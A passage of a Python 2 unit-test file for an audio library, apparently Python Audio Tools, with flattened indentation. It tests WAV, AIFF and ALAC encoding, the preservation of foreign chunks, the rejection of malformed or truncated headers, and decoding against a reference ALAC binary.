self.assertRaises(ValueError,
ERROR_PCM_Reader(ValueError("error"),
failure_chance=1.0).read,
1)
self.assertRaises(IOError,
ERROR_PCM_Reader(IOError("error"),
failure_chance=1.0).read,
1)
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
os.path.join(temp_dir,
"invalid" + self.suffix),
ERROR_PCM_Reader(IOError("I/O Error")))
self.assertEqual(os.path.isfile(
os.path.join(temp_dir,
"invalid" + self.suffix)),
False)
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
os.path.join(temp_dir,
"invalid" + self.suffix),
ERROR_PCM_Reader(IOError("I/O Error")))
self.assertEqual(os.path.isfile(
os.path.join(temp_dir,
"invalid" + self.suffix)),
False)
#test unwritable output file
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
"/dev/null/foo.%s" % (self.suffix),
BLANK_PCM_Reader(1))
#test without suffix
reader = BLANK_PCM_Reader(5)
if (compression is None):
track = self.audio_class.from_pcm(temp2.name, reader)
else:
track = self.audio_class.from_pcm(temp2.name, reader,
compression)
counter = FrameCounter(2, 16, 44100)
audiotools.transfer_framelist_data(track.to_pcm(),
counter.update)
self.assertEqual(int(counter), 5,
"mismatch encoding %s at quality %s" % \
(self.audio_class.NAME,
compression))
finally:
temp.close()
temp2.close()
for f in os.listdir(temp_dir):
os.unlink(os.path.join(temp_dir, f))
os.rmdir(temp_dir)
@FORMAT_LOSSY
def test_convert(self):
if (self.audio_class is audiotools.AudioFile):
return
#check various round-trip options
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(
temp.name,
test_streams.Sine16_Stereo(220500, 44100,
8820.0, 0.70, 4410.0, 0.29, 1.0))
for audio_class in audiotools.AVAILABLE_TYPES:
temp2 = tempfile.NamedTemporaryFile(
suffix="." + audio_class.SUFFIX)
try:
track2 = track.convert(temp2.name,
audio_class)
counter = FrameCounter(2, 16, 44100)
audiotools.transfer_framelist_data(track2.to_pcm(),
counter.update)
self.assertEqual(
int(counter), 5,
"mismatch encoding %s" % \
(self.audio_class.NAME))
self.assertRaises(audiotools.EncodingError,
track.convert,
"/dev/null/foo.%s" % \
(audio_class.SUFFIX),
audio_class)
for compression in audio_class.COMPRESSION_MODES:
track2 = track.convert(temp2.name,
audio_class,
compression)
counter = FrameCounter(2, 16, 44100)
audiotools.transfer_framelist_data(track2.to_pcm(),
counter.update)
self.assertEqual(
int(counter), 5,
"mismatch encoding %s at quality %s" % \
(self.audio_class.NAME,
compression))
#check some obvious failures
self.assertRaises(audiotools.EncodingError,
track.convert,
"/dev/null/foo.%s" % \
(audio_class.SUFFIX),
audio_class,
compression)
finally:
temp2.close()
finally:
temp.close()
class TestForeignWaveChunks:
@FORMAT_LOSSLESS
def test_convert_wave_chunks(self):
import filecmp
self.assert_(issubclass(self.audio_class,
audiotools.WaveContainer))
#several even-sized chunks
chunks1 = (("x\x9c\x0b\xf2ts\xdbQ\xc9\xcb\x10\xee\x18" +
"\xe6\x9a\x96[\xa2 \xc0\xc0\xc0\xc0\xc8\xc0" +
"\xc4\xe0\xb2\x86\x81A`#\x13\x03\x0b\x83" +
"\x00CZ~~\x15\x07P\xbc$\xb5\xb8\xa4$\xb5" +
"\xa2$)\xb1\xa8\n\xa4\xae8?757\xbf(\x15!^U" +
"\x05\xd40\nF\xc1(\x18\xc1 %\xb1$1\xa0\x94" +
"\x97\x01\x00`\xb0\x18\xf7").decode('zlib'),
(220500, 44100, 2, 16, 0x3),
"spam\x0c\x00\x00\x00anotherchunk")
#several odd-sized chunks
chunks2 = (("x\x9c\x0b\xf2ts\xcbc``\x08w\x0csM\xcb\xcf\xaf" +
"\xe2b@\x06i\xb9%\n\x02@\x9a\x11\x08]\xd60" +
"\x801#\x03\x07CRbQ\x157H\x1c\x01\x18R\x12K\x12" +
"\xf9\x81b\x00\x19\xdd\x0ba").decode('zlib'),
(15, 44100, 1, 8, 0x4),
"\x00barz\x0b\x00\x00\x00\x01\x01\x01\x01" +
"\x01\x01\x01\x01\x01\x01\x01\x00")
for (header,
(total_frames,
sample_rate,
channels,
bits_per_sample,
channel_mask), footer) in [chunks1, chunks2]:
temp1 = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
#build our audio file from the from_pcm() interface
track = self.audio_class.from_pcm(
temp1.name,
EXACT_RANDOM_PCM_Reader(
pcm_frames=total_frames,
sample_rate=sample_rate,
channels=channels,
bits_per_sample=bits_per_sample,
channel_mask=channel_mask))
#check has_foreign_wave_chunks
self.assertEqual(track.has_foreign_wave_chunks(), False)
finally:
temp1.close()
for (header,
(total_frames,
sample_rate,
channels,
bits_per_sample,
channel_mask), footer) in [chunks1, chunks2]:
temp1 = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
#build our audio file using the from_wave() interface
track = self.audio_class.from_wave(
temp1.name,
header,
EXACT_RANDOM_PCM_Reader(
pcm_frames=total_frames,
sample_rate=sample_rate,
channels=channels,
bits_per_sample=bits_per_sample,
channel_mask=channel_mask),
footer)
#check has_foreign_wave_chunks
self.assertEqual(track.has_foreign_wave_chunks(), True)
#ensure wave_header_footer returns same header and footer
(track_header,
track_footer) = track.wave_header_footer()
self.assertEqual(header, track_header)
self.assertEqual(footer, track_footer)
#convert our file to every other WaveContainer format
#(including our own)
for new_class in audiotools.AVAILABLE_TYPES:
if (isinstance(new_class, audiotools.WaveContainer)):
temp2 = tempfile.NamedTemporaryFile(
suffix="." + wav_class.SUFFIX)
log = Log()
try:
track2 = track.convert(temp2,
new_class,
log.update)
#ensure the progress function
#gets called during conversion
self.assert_(
len(log.results) > 0,
"no logging converting %s to %s" %
(self.audio_class.NAME,
new_class.NAME))
self.assert_(
len(set([r[1] for r in log.results])) == 1)
for x, y in zip(log.results[1:], log.results):
self.assert_((x[0] - y[0]) >= 0)
#ensure newly converted file
#matches has_foreign_wave_chunks
self.assertEqual(
track2.has_foreign_wave_chunks(), True)
#ensure newly converted file
#has same header and footer
(track2_header,
track2_footer) = track2.wave_header_footer()
self.assertEqual(header, track2_header)
self.assertEqual(footer, track2_footer)
#ensure newly converted file has same PCM data
self.assertEqual(
audiotools.pcm_frame_cmp(
track.to_pcm(), track2.to_pcm()), None)
finally:
temp2.close()
finally:
temp1.close()
if (os.path.isfile("bad.wav")):
os.unlink("bad.wav")
for (header, footer) in [
#wave header without "RIFF<size>WAVE raises an error
("", ""),
("FOOZ\x00\x00\x00\x00BARZ", ""),
#invalid total size raises an error
("RIFFZ\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00" +
"\x10\x00data2\x00\x00\x00", ""),
#invalid data size raises an error
("RIFFV\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00" +
"\x10\x00data6\x00\x00\x00", ""),
#invalid chunk IDs in header raise an error
("RIFFb\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
"chn\x00\x04\x00\x00\x00\x01\x02\x03\x04" +
"data2\x00\x00\x00", ""),
#mulitple fmt chunks raise an error
("RIFFn\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00" +
"\x10\x00" +
"fmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00" +
"\x10\x00" +
"data2\x00\x00\x00", ""),
#data chunk before fmt chunk raises an error
("RIFFJ\x00\x00\x00WAVE" +
"chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
"data2\x00\x00\x00", ""),
#bytes after data chunk raises an error
("RIFFb\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
"chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
"data3\x00\x00\x00\x01", ""),
#truncated chunks in header raise an error
("RIFFb\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
"chnk\x04\x00\x00\x00\x01\x02\x03", ""),
#fmt chunk in footer raises an error
("RIFFz\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
"chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
"data2\x00\x00\x00",
"fmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00"),
#data chunk in footer raises an error
("RIFFn\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
"chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
"data2\x00\x00\x00",
"data\x04\x00\x00\x00\x01\x02\x03\x04"),
#invalid chunk IDs in footer raise an error
("RIFFn\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
"chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
"data2\x00\x00\x00",
"chn\x00\x04\x00\x00\x00\x01\x02\x03\x04"),
#truncated chunks in footer raise an error
("RIFFn\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
"\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
"chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
"data2\x00\x00\x00",
"chnk\x04\x00\x00\x00\x01\x02\x03"),
]:
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_wave,
"bad.wav",
header,
EXACT_BLANK_PCM_Reader(25,
44100,
1,
16,
0x4),
footer)
self.assertEqual(os.path.isfile("bad.wav"), False)
class TestForeignAiffChunks:
@FORMAT_LOSSLESS
def test_convert_aiff_chunks(self):
import filecmp
self.assert_(issubclass(self.audio_class,
audiotools.AiffContainer))
#several even-sized chunks
chunks1 = (("x\x9cs\xf3\x0f\xf2e\xe0\xad<\xe4\xe8\xe9\xe6\xe6" +
"\xec\xef\xeb\xcb\xc0\xc0 \xc4\xc0\xc4\xc0\x1c\x1b" +
"\xc2 \xe0\xc0\xb7\xc6\x85\x01\x0c\xdc\xfc\xfd\xa3" +
"\x80\x14GIjqIIjE\x89\x93c\x10\x88/P\x9c\x9f\x9b" +
"\x9a\x9b_\x94\x8a\x10\x8f\x02\x8a\xb30\x8c" +
"\x82Q0\nF.\x08\x0e\xf6sa\xe0-\x8d\x80\xf1\x01" +
"\xcf\x8c\x17\x18").decode('zlib'),
(220500, 44100, 2, 16, 0x3),
"SPAM\x00\x00\x00\x0canotherchunk")
#several odd-sized chunks
chunks2 = (("x\x9cs\xf3\x0f\xf2e``\xa8p\xf4tss\xf3\xf7\x8f" +
"\x02\xb2\xb9\x18\xe0\xc0\xd9\xdf\x17$+\xc4\xc0" +
"\x08$\xf9\x198\x1c\xf8\xd6\xb8@d\x9c\x1c\x83@j" +
"\xb9\x19\x11\x80!8\xd8\x0f$+\x0e\xd3\r" +
"\x00\x16\xa5\t3").decode('zlib'),
(15, 44100, 1, 8, 0x4),
"\x00BAZZ\x00\x00\x00\x0b\x02\x02\x02\x02" +
"\x02\x02\x02\x02\x02\x02\x02\x00")
for (header,
(total_frames,
sample_rate,
channels,
bits_per_sample,
channel_mask), footer) in [chunks1, chunks2]:
temp1 = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
#build our audio file from the from_pcm() interface
track = self.audio_class.from_pcm(
temp1.name,
EXACT_RANDOM_PCM_Reader(
pcm_frames=total_frames,
sample_rate=sample_rate,
channels=channels,
bits_per_sample=bits_per_sample,
channel_mask=channel_mask))
#check has_foreign_aiff_chunks()
self.assertEqual(track.has_foreign_aiff_chunks(), False)
finally:
temp1.close()
for (header,
(total_frames,
sample_rate,
channels,
bits_per_sample,
channel_mask), footer) in [chunks1, chunks2]:
temp1 = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
#build our audio file using from_aiff() interface
track = self.audio_class.from_aiff(
temp1.name,
header,
EXACT_RANDOM_PCM_Reader(
pcm_frames=total_frames,
sample_rate=sample_rate,
channels=channels,
bits_per_sample=bits_per_sample,
channel_mask=channel_mask),
footer)
#check has_foreign_aiff_chunks()
self.assertEqual(track.has_foreign_aiff_chunks(), True)
#ensure aiff_header_footer returns same header and footer
(track_header,
track_footer) = track.aiff_header_footer()
self.assertEqual(header, track_header)
self.assertEqual(footer, track_footer)
#convert our file to every other AiffContainer format
#(including our own)
for new_class in audiotools.AVAILABLE_TYPES:
if (isinstance(new_class, audiotools.AiffContainer)):
temp2 = tempfile.NamedTemporaryFile(
suffix="." + wav_class.SUFFIX)
log = Log()
try:
track2 = track.convert(temp2,
new_class,
log.update)
#ensure the progress function
#gets called during conversion
self.assert_(
len(log.results) > 0,
"no logging converting %s to %s" %
(self.audio_class.NAME,
new_class.NAME))
self.assert_(
len(set([r[1] for r in log.results])) == 1)
for x, y in zip(log.results[1:], log.results):
self.assert_((x[0] - y[0]) >= 0)
#ensure newly converted file
#matches has_foreign_wave_chunks
self.assertEqual(
track2.has_foreign_aiff_chunks(), True)
#ensure newly converted file
#has same header and footer
(track2_header,
track2_footer) = track2.aiff_header_footer()
self.assertEqual(header, track2_header)
self.assertEqual(footer, track2_footer)
#ensure newly converted file has same PCM data
self.assertEqual(
audiotools.pcm_frame_cmp(
track.to_pcm(), track2.to_pcm()), None)
finally:
temp2.close()
finally:
temp1.close()
if (os.path.isfile("bad.aiff")):
os.unlink("bad.aiff")
for (header, footer) in [
#aiff header without "FORM<size>AIFF raises an error
("", ""),
("FOOZ\x00\x00\x00\x00BARZ", ""),
#invalid total size raises an error
("FORM\x00\x00\x00tAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#invalid SSND size raises an error
("FORM\x00\x00\x00rAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#invalid chunk IDs in header raise an error
("FORM\x00\x00\x00~AIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"CHN\x00\x00\x00\x00\x04\x01\x02\x03\x04" +
"SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#mulitple COMM chunks raise an error
("FORM\x00\x00\x00\x8cAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#SSND chunk before COMM chunk raises an error
("FORM\x00\x00\x00XAIFF" +
"SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#bytes missing from SSNK chunk raises an error
("FORM\x00\x00\x00rAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00<\x00\x00\x00\x00\x00\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#bytes after SSND chunk raises an error
("FORM\x00\x00\x00rAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#truncated chunks in header raise an error
("FORM\x00\x00\x00rAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#COMM chunk in footer raises an error
("FORM\x00\x00\x00\x8cAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#SSND chunk in footer raises an error
("FORM\x00\x00\x00rAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00"),
#invalid chunk IDs in footer raise an error
("FORM\x00\x00\x00rAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
"ID3\00\x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
#truncated chunks in footer raise an error
("FORM\x00\x00\x00rAIFF" +
"COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
"\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
"SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
"ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00"),
]:
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_aiff,
"bad.aiff",
header,
EXACT_BLANK_PCM_Reader(25,
44100,
1,
16,
0x4),
footer)
self.assertEqual(os.path.isfile("bad.aiff"), False)
class AiffFileTest(TestForeignAiffChunks, LosslessFileTest):
def setUp(self):
self.audio_class = audiotools.AiffAudio
self.suffix = "." + self.audio_class.SUFFIX
@FORMAT_AIFF
def test_ieee_extended(self):
from audiotools.bitstream import BitstreamReader, BitstreamRecorder
import audiotools.aiff
for i in xrange(0, 192000 + 1):
w = BitstreamRecorder(0)
audiotools.aiff.build_ieee_extended(w, float(i))
s = cStringIO.StringIO(w.data())
self.assertEqual(w.data(), s.getvalue())
self.assertEqual(i, audiotools.aiff.parse_ieee_extended(
BitstreamReader(s, 0)))
@FORMAT_AIFF
def test_verify(self):
import audiotools.aiff
#test truncated file
for aiff_file in ["aiff-8bit.aiff",
"aiff-1ch.aiff",
"aiff-2ch.aiff",
"aiff-6ch.aiff"]:
f = open(aiff_file, 'rb')
aiff_data = f.read()
f.close()
temp = tempfile.NamedTemporaryFile(suffix=".aiff")
try:
#first, check that a truncated comm chunk raises an exception
#at init-time
for i in xrange(0, 0x25):
temp.seek(0, 0)
temp.write(aiff_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
self.assertRaises(audiotools.InvalidFile,
audiotools.AiffAudio,
temp.name)
#then, check that a truncated ssnd chunk raises an exception
#at read-time
for i in xrange(0x37, len(aiff_data)):
temp.seek(0, 0)
temp.write(aiff_data[0:i])
temp.flush()
reader = audiotools.AiffAudio(temp.name).to_pcm()
self.assertNotEqual(reader, None)
self.assertRaises(IOError,
audiotools.transfer_framelist_data,
reader, lambda x: x)
finally:
temp.close()
#test non-ASCII chunk ID
temp = tempfile.NamedTemporaryFile(suffix=".aiff")
try:
f = open("aiff-metadata.aiff")
aiff_data = list(f.read())
f.close()
aiff_data[0x89] = chr(0)
temp.seek(0, 0)
temp.write("".join(aiff_data))
temp.flush()
aiff = audiotools.open(temp.name)
self.assertRaises(audiotools.InvalidFile,
aiff.verify)
finally:
temp.close()
#test no SSND chunk
aiff = audiotools.open("aiff-nossnd.aiff")
self.assertRaises(audiotools.InvalidFile, aiff.verify)
#test convert errors
temp = tempfile.NamedTemporaryFile(suffix=".aiff")
try:
temp.write(open("aiff-2ch.aiff", "rb").read()[0:-10])
temp.flush()
flac = audiotools.open(temp.name)
if (os.path.isfile("dummy.wav")):
os.unlink("dummy.wav")
self.assertEqual(os.path.isfile("dummy.wav"), False)
self.assertRaises(audiotools.EncodingError,
flac.convert,
"dummy.wav",
audiotools.WaveAudio)
self.assertEqual(os.path.isfile("dummy.wav"), False)
finally:
temp.close()
COMM = audiotools.aiff.AIFF_Chunk(
"COMM",
18,
'\x00\x01\x00\x00\x00\r\x00\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00')
SSND = audiotools.aiff.AIFF_Chunk(
"SSND",
34,
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x02\x00\x01\x00\x00\xff\xff\xff\xfe\xff\xfd\xff\xfe\xff\xff\x00\x00')
#test multiple COMM chunks found
#test multiple SSND chunks found
#test SSND chunk before COMM chunk
#test no SSND chunk
#test no COMM chunk
for chunks in [[COMM, COMM, SSND],
[COMM, SSND, SSND],
[SSND, COMM],
[SSND],
[COMM]]:
temp = tempfile.NamedTemporaryFile(suffix=".aiff")
try:
audiotools.AiffAudio.aiff_from_chunks(temp.name, chunks)
self.assertRaises(
audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
@FORMAT_AIFF
def test_clean(self):
import audiotools.aiff
COMM = audiotools.aiff.AIFF_Chunk(
"COMM",
18,
'\x00\x01\x00\x00\x00\r\x00\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00')
SSND = audiotools.aiff.AIFF_Chunk(
"SSND",
34,
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x02\x00\x01\x00\x00\xff\xff\xff\xfe\xff\xfd\xff\xfe\xff\xff\x00\x00')
#test multiple COMM chunks
#test multiple SSND chunks
#test data chunk before fmt chunk
temp = tempfile.NamedTemporaryFile(suffix=".aiff")
fixed = tempfile.NamedTemporaryFile(suffix=".aiff")
try:
for chunks in [[COMM, COMM, SSND],
[COMM, SSND, COMM],
[COMM, SSND, SSND],
[SSND, COMM],
[SSND, COMM, COMM]]:
audiotools.AiffAudio.aiff_from_chunks(temp.name, chunks)
fixes = []
aiff = audiotools.open(temp.name).clean(fixes, fixed.name)
chunks = list(aiff.chunks())
self.assertEquals([c.id for c in chunks],
[c.id for c in [COMM, SSND]])
self.assertEquals([c.__size__ for c in chunks],
[c.__size__ for c in [COMM, SSND]])
self.assertEquals([c.__data__ for c in chunks],
[c.__data__ for c in [COMM, SSND]])
finally:
temp.close()
fixed.close()
class ALACFileTest(LosslessFileTest):
def setUp(self):
self.audio_class = audiotools.ALACAudio
self.suffix = "." + self.audio_class.SUFFIX
from audiotools.decoders import ALACDecoder
from audiotools.encoders import encode_alac
self.decoder = ALACDecoder
self.encode = encode_alac
@FORMAT_ALAC
def test_init(self):
#check missing file
self.assertRaises(audiotools.m4a.InvalidALAC,
audiotools.ALACAudio,
"/dev/null/foo")
#check invalid file
invalid_file = tempfile.NamedTemporaryFile(suffix=".m4a")
try:
for c in "invalidstringxxx":
invalid_file.write(c)
invalid_file.flush()
self.assertRaises(audiotools.m4a.InvalidALAC,
audiotools.ALACAudio,
invalid_file.name)
finally:
invalid_file.close()
#check some decoder errors,
#mostly to ensure a failed init doesn't make Python explode
self.assertRaises(TypeError, self.decoder)
self.assertRaises(TypeError, self.decoder, None)
@FORMAT_ALAC
def test_bits_per_sample(self):
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for bps in (16, 24):
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, bits_per_sample=bps))
self.assertEqual(track.bits_per_sample(), bps)
track2 = audiotools.open(temp.name)
self.assertEqual(track2.bits_per_sample(), bps)
finally:
temp.close()
@FORMAT_ALAC
def test_channel_mask(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for mask in [["front_center"],
["front_left",
"front_right"]]:
cm = audiotools.ChannelMask.from_fields(**dict(
[(f, True) for f in mask]))
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=len(cm), channel_mask=int(cm)))
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
for mask in [["front_center",
"front_left",
"front_right"],
["front_center",
"front_left",
"front_right",
"back_center"],
["front_center",
"front_left",
"front_right",
"back_left",
"back_right"],
["front_center",
"front_left",
"front_right",
"back_left",
"back_right",
"low_frequency"],
["front_center",
"front_left",
"front_right",
"back_left",
"back_right",
"back_center",
"low_frequency"],
["front_center",
"front_left_of_center",
"front_right_of_center",
"front_left",
"front_right",
"back_left",
"back_right",
"low_frequency"]]:
cm = audiotools.ChannelMask.from_fields(**dict(
[(f, True) for f in mask]))
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=len(cm), channel_mask=int(cm)))
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
#ensure valid channel counts with invalid channel masks
#raise an exception
self.assertRaises(audiotools.UnsupportedChannelMask,
self.audio_class.from_pcm,
temp.name,
BLANK_PCM_Reader(1, channels=4,
channel_mask=0x0033))
self.assertRaises(audiotools.UnsupportedChannelMask,
self.audio_class.from_pcm,
temp.name,
BLANK_PCM_Reader(1, channels=5,
channel_mask=0x003B))
finally:
temp.close()
@FORMAT_ALAC
def test_verify(self):
alac_data = open("alac-allframes.m4a", "rb").read()
#test truncating the mdat atom triggers IOError
temp = tempfile.NamedTemporaryFile(suffix='.m4a')
try:
for i in xrange(0x16CD, len(alac_data)):
temp.seek(0, 0)
temp.write(alac_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
decoder = audiotools.open(temp.name).to_pcm()
self.assertNotEqual(decoder, None)
self.assertRaises(IOError,
audiotools.transfer_framelist_data,
decoder, lambda x: x)
self.assertRaises(audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
#test a truncated file's convert() method raises EncodingError
temp = tempfile.NamedTemporaryFile(suffix=".m4a")
try:
temp.write(open("alac-allframes.m4a", "rb").read()[0:-10])
temp.flush()
flac = audiotools.open(temp.name)
if (os.path.isfile("dummy.wav")):
os.unlink("dummy.wav")
self.assertEqual(os.path.isfile("dummy.wav"), False)
self.assertRaises(audiotools.EncodingError,
flac.convert,
"dummy.wav",
audiotools.WaveAudio)
self.assertEqual(os.path.isfile("dummy.wav"), False)
finally:
temp.close()
@FORMAT_ALAC
def test_too(self):
#ensure that the 'too' meta atom isn't modified by setting metadata
temp = tempfile.NamedTemporaryFile(
suffix=self.suffix)
try:
track = self.audio_class.from_pcm(
temp.name,
BLANK_PCM_Reader(1))
metadata = track.get_metadata()
encoder = unicode(metadata['ilst']['\xa9too'])
track.set_metadata(audiotools.MetaData(track_name=u"Foo"))
metadata = track.get_metadata()
self.assertEqual(metadata.track_name, u"Foo")
self.assertEqual(unicode(metadata['ilst']['\xa9too']), encoder)
finally:
temp.close()
def __test_reader__(self, pcmreader, block_size=4096):
if (not audiotools.BIN.can_execute(audiotools.BIN["alac"])):
self.assert_(False,
"reference ALAC binary alac(1) required for this test")
temp_file = tempfile.NamedTemporaryFile(suffix=".alac")
self.audio_class.from_pcm(temp_file.name,
pcmreader,
block_size=block_size)
alac = audiotools.open(temp_file.name)
self.assert_(alac.total_frames() > 0)
#first, ensure the ALAC-encoded file
#has the same MD5 signature as pcmreader once decoded
md5sum_decoder = md5()
d = alac.to_pcm()
f = d.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum_decoder.update(f.to_bytes(False, True))
f = d.read(audiotools.FRAMELIST_SIZE)
d.close()
self.assertEqual(md5sum_decoder.digest(), pcmreader.digest())
#then compare our .to_pcm() output
#with that of the ALAC reference decoder
reference = subprocess.Popen([audiotools.BIN["alac"],
"-r", temp_file.name],
stdout=subprocess.PIPE)
md5sum_reference = md5()
audiotools.transfer_data(reference.stdout.read, md5sum_reference.update)
self.assertEqual(reference.wait(), 0)
self.assertEqual(md5sum_reference.digest(), pcmreader.digest(),
"mismatch decoding %s from reference (%s != %s)" %
(repr(pcmreader),
md5sum_reference.hexdigest(),
pcmreader.hexdigest()))
def __test_reader_nonalac__(self, pcmreader, block_size=4096):
#This is for multichannel testing
#since alac(1) doesn't handle them yet.
#Unfortunately, it relies only on our built-in decoder
#to test correctness.
